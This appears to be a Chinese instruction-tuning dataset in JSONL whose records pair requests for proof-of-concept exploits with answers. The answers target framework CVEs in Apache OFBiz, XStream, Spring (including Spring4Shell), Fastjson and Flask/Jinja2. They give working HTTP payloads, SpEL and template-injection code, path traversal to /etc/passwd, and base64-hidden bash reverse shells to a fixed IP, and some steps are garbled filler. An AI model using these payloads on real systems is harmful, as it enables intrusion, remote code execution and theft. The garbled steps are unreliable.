  1122. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache OfBiz 反序列化命令执行漏洞CVE-2020-9496\n漏洞描述:Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。 其17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞,攻击者利用这个漏洞可以在目标服务器上执行任意命令。 参考链接: - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz - https://github.com/dwisiswant0/CVE-2020-9496 - https://www.cnblogs.com/ph4nt0mer/p/13576739.html\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2020-9496\n【POC利用方法】\n1. docker-compose up -d\n2. java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 \"touch /tmp/awesome_poc\" | base64 | tr -d \"\\n\"\n3. POST /webtools/control/xmlrpc HTTP/1.1\nHost: your-ip\nContent-Type: application/xml\nContent-Length: 4093\n\n<?xml version=\"1.0\"?>\n<methodCall>\n  <methodName>ProjectDiscovery</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>test</name>\n            <value>\n              <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">[base64-payload]</serializable>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache OfBiz 反序列化命令执行漏洞 CVE-2020-9496.md"}
    1123. 

  1123. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:XStream 任意文件删除 反序列化漏洞 CVE-2020-26259\n漏洞描述:Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发。 参考链接: - https://x-stream.github.io/CVE-2020-26259.html\n影响版本:影响版本: ``` Xstream < = 1.4.14 ``` 修复版本: ``` Xstream < = 1.4.15 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2020-26259\n【POC利用方法】\n1. Xstream < = 1.4.14\n2. Xstream < = 1.4.15\n3. import com.thoughtworks.xstream.XStream;\n\n/*\nCVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host\nwhen unmarshalling as long as the executing process has sufficient rights.\nhttps://x-stream.github.io/CVE-2020-26259.html\nSecurity framework of XStream not explicitly initialized, using predefined black list on your own risk.\n */\n \npublic class CVE_2020_26259 {\n    public static void main(String[] args) {\n        String xml_poc = \"<map>\\n\" +\n                \"  <entry>\\n\" +\n                \"    <jdk.nashorn.internal.objects.NativeString>\\n\" +\n                \"      <flags>0</flags>\\n\" +\n                \"      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\\n\" +\n                \"        <dataHandler>\\n\" +\n                \"          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\\n\" +\n                \"            <contentType>text/plain</contentType>\\n\" +\n                \"            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>\\n\" +\n                \"              <tempFile>/tmp/CVE-2020-26259</tempFile>\\n\" +\n                \"            </is>\\n\" +\n                \"          </dataSource>\\n\" +\n                \"          <transferFlavors/>\\n\" +\n                \"        </dataHandler>\\n\" +\n                \"        <dataLen>0</dataLen>\\n\" +\n                \"      </value>\\n\" +\n                \"    </jdk.nashorn.internal.objects.NativeString>\\n\" +\n                \"    <string>test</string>\\n\" +\n                \"  </entry>\\n\" +\n                \"</map>\";\n        XStream xstream = new XStream();\n        xstream.fromXML(xml_poc);\n    }\n}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/XStream 任意文件删除 反序列化漏洞 CVE-2020-26259.md"}
    1124. 

  1124. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Data Binding与JDK 9+导致的远程代码执行漏洞 CVE-2022-22965\n漏洞描述:在JDK 9+上运行的Spring MVC或Spring WebFlux应用程序可能存在通过数据绑定执行远程代码(RCE)的漏洞。 现在已知的利用方法要求应用程序以WAR部署的形式在Tomcat上运行,然而,该漏洞的性质更为普遍,可能有其他方法可以利用它。 参考链接: - https://tanzu.vmware.com/security/cve-2022-22965 - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-22965\n【POC利用方法】\n1. docker-compose up -d\n2. GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1\nHost: your-:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nsuffix: %>//\nc1: Runtime\nc2: <%\nDNT: 1\n3. http://your-ip:8080/tomcatwar.jsp?pwd=j&cmd=id\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Data Binding与JDK 9+导致的远程代码执行漏洞 CVE-2022-22965.md"}
    1125. 

  1125. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Security OAuth2 远程命令执行漏洞 CVE-2016-4977\n漏洞描述:Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 参考链接: - http://secalert.net/#CVE-2016-4977 - https://deadpool.sh/2017/RCE-Springs/ - http://blog.knownsec.com/2016/10/spring-security-oauth-rce/\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2016-4977\n【POC利用方法】\n1. docker-compose up -d\n2. bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTc0LjEyOC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}\n3. #!/usr/bin/env python\n\nmessage = input('Enter message to encode:')\n\npoc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])\n\nfor ch in message[1:]:\n   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) \n\npoc += ')}'\n\nprint(poc)\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Security OAuth2 远程命令执行漏洞 CVE-2016-4977.md"}
    1126. 

  1126. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Spark create 未授权访问漏洞\n漏洞描述:Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。 参考链接: - https://weibo.com/ttarticle/p/show?id=2309404187794313453016 - https://xz.aliyun.com/t/2490\n影响版本:``` Apache Spark 3.1.2, 3.2.1, 3.3.0 ```\n网络测绘:``` app=\"APACHE-Spark-Jobs\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. Apache Spark 3.1.2, 3.2.1, 3.3.0\n2. app=\"APACHE-Spark-Jobs\"\n3. docker-compose up -d\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache Spark create 未授权访问漏洞.md"}
    1127. 

  1127. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Data Commons 远程命令执行漏洞 CVE-2018-1273\n漏洞描述:Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 参考链接: - https://pivotal.io/security/cve-2018-1273 - https://xz.aliyun.com/t/2269 - https://mp.weixin.qq.com/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483666&idx=1&sn=91e3b2aab354c55e0677895c02fb068c\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2018-1273\n【POC利用方法】\n1. docker-compose up -d\n2. POST /users?page=&size=5 HTTP/1.1\nHost: localhost:8080\nConnection: keep-alive\nContent-Length: 124\nPragma: no-cache\nCache-Control: no-cache\nOrigin: http://localhost:8080\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nReferer: http://localhost:8080/users?page=0&size=5\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\nusername[#this.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"touch /tmp/awesome_poc\")]=&password=&repeatedPassword=\n3. # URL编码前\nbash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYxCgo=}|{base64,-d}|{bash,-i}\n\n# URL编码后\nbash -c {echo,YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYxCgo%3D}|{base64,-d}|{bash,-i}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Data Commons 远程命令执行漏洞 CVE-2018-1273.md"}
    1128. 

  1128. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Boot 目录遍历 CVE-2021-21234\n漏洞描述:spring-boot-actuator-logview 是一个简单的日志文件查看器,在 0.2.13 版本之前存在目录遍历漏洞。\n影响版本:``` spring-boot-actuator-logview < 0.2.13 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2021-21234\n【POC利用方法】\n1. spring-boot-actuator-logview < 0.2.13\n2. http://<your-ip>/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ \nhttp://<your-ip>/log/view?filename=/windows/win.ini&base=../../../../../../../../../../\n3. http://<your-ip>/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../\nhttp://<your-ip>/log/view?filename=/etc/passwd&base=../../../../../../../../../../\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Boot 目录遍历 CVE-2021-21234.md"}
    1129. 

  1129. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Fastjson 1.2.47 远程命令执行漏洞\n漏洞描述:Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 参考链接: - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 - https://www.freebuf.com/vuls/208339.html\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. // javac TouchFile.java\nimport java.lang.Runtime;\nimport java.lang.Process;\n\npublic class TouchFile {\n    static {\n        try {\n            Runtime rt = Runtime.getRuntime();\n            String[] commands = {\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/192.168.174.128/9999;cat <&5 | while read line; do $line 2>&5 >&5; done\"};\n            Process pc = rt.exec(commands);\n            pc.waitFor();\n        } catch (Exception e) {\n            // do nothing\n        }\n    }\n}\n3. String[] commands = {\"bash\", \"-c\",\"{echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDMuMTQ3LjEyNy85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}\"};\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Fastjson 1.2.47 远程命令执行漏洞.md"}
    1130. 

  1130. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Fastjson 1.2.24 反序列化导致任意命令执行漏洞\n漏洞描述:Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 参考资料: - https://www.freebuf.com/vuls/208339.html - [http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/](http://xxlegend.com/2017/04/29/title- fastjson 远程反序列化poc的构造和分析/)\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. curl http://your-ip:8090/ -H \"Content-Type: application/json\" --data '{\"name\":\"hello\", \"age\":20}'\n3. {\"@type\":\"java.net.Inet4Address\",\"val\":\"dnslog\"}\n{\"@type\":\"java.net.Inet6Address\",\"val\":\"dnslog\"}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Fastjson 1.2.24 反序列化导致任意命令执行漏洞.md"}
    1131. 

  1131. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Flask Jinja2 服务端模板注入漏洞\n漏洞描述:参考阅读: - https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf - http://rickgray.me/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. {% for c in [].__class__.__base__.__subclasses__() %}\n{% if c.__name__ == 'catch_warnings' %}\n  {% for b in c.__init__.__globals__.values() %}\n  {% if b.__class__ == {}.__class__ %}\n    {% if 'eval' in b.keys() %}\n      {{ b['eval']('__import__(\"os\").popen(\"id\").read()') }}\n    {% endif %}\n  {% endif %}\n  {% endfor %}\n{% endif %}\n{% endfor %}\n3. http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Flask Jinja2 服务端模板注入漏洞.md"}
    1132.